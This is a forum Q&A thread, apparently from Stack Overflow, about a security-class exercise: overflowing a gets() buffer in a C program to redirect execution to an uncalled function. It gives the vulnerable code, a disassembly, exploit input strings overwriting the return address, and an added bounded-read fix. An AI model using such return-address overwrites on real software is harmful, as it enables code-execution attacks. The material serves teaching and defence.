
So I'm working on an assignment for a security class, and the assignment is to use a stack overflow to call the function oopsDidISmashTheStack, which is never used in the program.

#include <stdio.h>
#include <stdlib.h>

/* Never called anywhere in the program; the exercise is to reach it
   by overwriting getUserInput's saved return address. */
int oopsDidISmashTheStack(void)
{
    printf("Yup, smashing the stack is fun!\n");
    exit(0);
}

int getUserInput (void)
{
    char buf[12];
    gets(buf);   /* unbounded read: input longer than 12 bytes runs past buf
                    into the saved frame pointer and return address */
    return(1);
}

int main(void)
{
    getUserInput ();
    printf("Overflow failed, normal return\n");
    return(1);
}

I understand the concept that after the buf variable comes the sfp and then the return address; what I can't figure out is the input that would change the return value to the address 0x080484fc, which is where the function is located. I thought that it would require 12 characters to fill the buffer, and then I was under the impression that the sfp and return address were 4 bytes each, so I was trying to fill the sfp with another 4 random characters and then use \xfc\x84\x04\x08 to make the return address point to the function.

If anyone is familiar with how the stack memory works and could explain where I'm going wrong, that would be great.

  • Can you add the disassembly that you get for `getUserInput` ? – us2012 Oct 01 '13 at 01:11
  • Dump of assembler code for function _Z12getUserInputv:
        0x080484b4 <_Z12getUserInputv+0>:  push %ebp
        0x080484b5 <_Z12getUserInputv+1>:  mov %esp,%ebp
        0x080484b7 <_Z12getUserInputv+3>:  sub $0x18,%esp
        0x080484ba <_Z12getUserInputv+6>:  lea 0xfffffff4(%ebp),%eax
        0x080484bd <_Z12getUserInputv+9>:  mov %eax,(%esp)
        0x080484c0 <_Z12getUserInputv+12>: call 0x8048390
        0x080484c5 <_Z12getUserInputv+17>: mov $0x1,%eax
        0x080484ca <_Z12getUserInputv+22>: leave
        0x080484cb <_Z12getUserInputv+23>: ret
    End of assembler dump. – Jesse Taylor Oct 01 '13 at 01:33
  • Hmmm, that looks okay. Have you stepped through it with `gdb` or a similar debugger to see whether what is happening agrees with what you expect? – us2012 Oct 01 '13 at 13:34
  • I've tried that and looked at the info frame, and I think it is, but I'm also not very familiar with the output from it, so I could be totally wrong. – Jesse Taylor Oct 01 '13 at 23:59
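As an added example (not code from the question, the answer, or the assignment), here is the bounded form of getUserInput that keeps the read inside the 12-byte buffer, which is the fix a defender makes once the layout described above (buf, then saved frame pointer, then return address) is understood. The names read_line_bounded, getUserInputSafe and feed_line are chosen here; the input line is the one from the question, constructed inline; and the in-memory FILE uses POSIX fmemopen, so a Linux or other POSIX system is assumed.

```c
#define _POSIX_C_SOURCE 200809L   /* for fmemopen() */
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 12   /* same size as buf[12] in getUserInput() above */

/*
 * Bounded replacement for gets(): reads one line into buf, keeping at
 * most size-1 characters and always NUL-terminating. If the line is
 * longer than the buffer, the rest of it is drained and counted, so it
 * can neither overwrite what follows buf on the stack nor linger in the
 * stream for the next read. Returns the number of bytes dropped, or -1
 * on EOF with nothing read.
 */
int read_line_bounded(FILE *in, char *buf, size_t size)
{
    int c, dropped = 0;
    size_t len;

    if (size == 0)
        return -1;
    if (fgets(buf, (int)size, in) == NULL) {
        buf[0] = '\0';
        return -1;
    }
    len = strlen(buf);
    if (len > 0 && buf[len - 1] == '\n') {
        buf[len - 1] = '\0';     /* whole line fit; strip the newline */
        return 0;
    }
    /* No newline in buf: the line was longer than the buffer (or EOF
     * ended it). Consume the remainder so it never reaches buf. */
    while ((c = fgetc(in)) != EOF && c != '\n')
        dropped++;
    return dropped;
}

/* Hardened getUserInput(): same 12-byte buffer, but the read stops at
 * its end, so the saved frame pointer and return address after it are
 * left untouched no matter how long the input line is. */
int getUserInputSafe(FILE *in)
{
    char buf[BUF_SIZE];
    int dropped = read_line_bounded(in, buf, sizeof buf);

    if (dropped > 0)
        fprintf(stderr, "input truncated, %d byte(s) dropped\n", dropped);
    return 1;
}

/* Helper (assumed, for demonstration): feed a constructed line through
 * read_line_bounded via an in-memory FILE (POSIX fmemopen). out receives
 * what the buffer would hold; the return value is the drop count. */
int feed_line(const char *input, char *out, size_t outsz)
{
    FILE *f = fmemopen((void *)input, strlen(input), "r");
    int dropped;

    if (f == NULL)
        return -2;
    dropped = read_line_bounded(f, out, outsz);
    fclose(f);
    return dropped;
}

int main(void)
{
    /* The 20-byte line from the question (12 filler + 4 for the saved
     * frame pointer + 4 address bytes), constructed here as sample input.
     * With gets() it overruns buf; with the bounded read only the first
     * 11 characters survive and the other 9 are discarded. */
    char buf[BUF_SIZE];
    int dropped = feed_line("012345678901xxxx\xfc\x84\x04\x08\n", buf, sizeof buf);

    printf("kept \"%s\" (%zu chars), dropped %d\n", buf, strlen(buf), dropped);
    return 0;
}
```

The drain loop matters: fgets alone leaves the unread tail of a long line in the stream, and a later read of the same descriptor would then receive it as if it were fresh input.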

1 Answer


You're pretty much on the right track. I suggest you look at the stack and see if the return address is where you think it is. There might be something else in there. Also double-check the endianness.

I assume this is your input string?

"012345678901xxxx\xfc\x84\x04\x08"

What is the output of your program? Generally, if you're close but don't get it quite right, the program crashes :)

– Michael
  • I just get segfaults. – Jesse Taylor Oct 01 '13 at 02:57
  • From your assembly it looks like 24 words are reserved (0x18). Perhaps the system is working with Unicode, double-byte strings. In that case the input string is being unpacked and thus the return address is not created correctly. – Michael Oct 03 '13 at 23:58
  • Or it is not being unpacked, and you need 24 bytes instead of 12 to reach the end of your buffer... "012345678901234567890123xxxx\xfc\x84\x04\x08" – Michael Oct 04 '13 at 06:48